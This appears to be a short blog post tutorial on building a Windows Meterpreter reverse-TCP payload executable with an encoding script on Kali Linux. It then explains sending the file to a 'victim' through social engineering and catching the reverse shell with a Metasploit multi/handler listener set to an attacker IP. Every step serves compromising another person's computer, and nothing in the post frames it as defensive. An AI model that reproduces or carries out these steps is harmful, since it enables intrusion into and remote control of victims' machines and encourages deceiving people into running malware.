Open your kali Linux terminal and type the following
command
https://github.com/wayneaswilliams/msfvenom_custom_encoding.git
Now
type following command to create payload
./msfven.sh
Now
Enter IP addresses of your kali Linux pc. And press enter. In next step it will
ask for port no. Enter the port no. Such as 4445 and press enter
In
next step use payloads e.g.windows/meterpreter/reverse_tcp
and press enter
Now
it will show a file with name tcp_445.exe now send your exe files to victim using
any social engineering technique.
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.140
exploit
Now
send your exe files
to victim using any social engineering technique. Now when the victim will use
exe you will get the meterpreter of victim PC.
0 comments:
Post a Comment